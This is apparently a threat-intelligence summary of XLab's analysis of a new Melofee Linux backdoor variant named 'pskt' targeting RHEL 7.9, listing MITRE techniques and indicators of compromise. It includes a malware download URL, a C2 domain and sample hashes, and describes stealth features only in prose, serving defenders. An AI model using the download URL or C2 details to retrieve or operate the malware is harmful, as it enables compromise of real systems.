Keypoints
- ELF sample named “pskt” was retrieved from IP address 45.92.156.166.
- Identified as a new Melofee backdoor variant targeting RHEL 7.9 systems.
- Includes an RC4-encrypted kernel driver to enhance stealth and hide activity.
- Command-and-control domain filemanage.micrsofts-file.com appears to be misattributed.
- IP 91.195.240.123 was flagged as malicious but is likely a false positive.
- Melofee runs in distinct Infection and Management modes with different functions.
- Stealth features include hiding network traffic and disguising processes.
MITRE Techniques
- [T1071] Command and Control – Uses multiple command and control domains to maintain communication with compromised systems. (‘Utilizes multiple command and control domains to maintain communication with compromised systems.’)
- [T1547] Persistence – Establishes persistence via crontab and by disguising process names. (‘Achieves persistence through crontab and disguises process names.’)
- [T1055] Process Injection – Installs a kernel driver to conceal malicious activities and hide processes. (‘Installs a kernel driver to conceal malicious activities.’)
- [T1005] Data from Local System – Gathers device information and performs file management on the compromised host. (‘Collects device information and manages files.’)
Indicators of Compromise
- [IP Address] sample source and C2 context – 45.92.156.166 (sample host and download URL), 91.195.240.123 (flagged as malicious but likely false positive)
- [Domain] command-and-control – filemanage.micrsofts-file.com (C2 domain noted as misattributed)
- [MD5] sample hashes – 603e38a59efcf6790f2b4593edb9faf5, 839f60efee25f07df7b23ba9d6bef892
- [URL] sample retrieval – http://45.92.156.166/klove/pskt (download path for the pskt ELF)
- [File name] binary – pskt (ELF backdoor sample found on RHEL 7.9)
————
XLab’s CTIA discovered a previously unseen Melofee backdoor variant in an ELF binary named “pskt” targeting Red Hat Enterprise Linux 7.9. The sample was hosted at 45.92.156.166 and initially went undetected on VirusTotal, prompting a deeper technical analysis that revealed significant stealth improvements over earlier Melofee samples.
Notably, this variant includes an RC4-encrypted kernel driver used to hide malicious behavior, plus mechanisms that obscure network traffic and process names. The malware operates in separate Infection and Management modes, enabling it to both establish footholds and perform ongoing control and data collection on compromised hosts.
The investigation also highlighted potential misattribution: the domain filemanage.micrsofts-file.com was tied to C2 activity but appears incorrectly attributed to a specific actor, and an IP (91.195.240.123) flagged as malicious may be a false positive. XLab encourages community input to refine attribution and expand technical understanding of this Melofee variant.
Read more: https://blog.xlab.qianxin.com/analysis_of_new_melofee_variant_en/ – get from article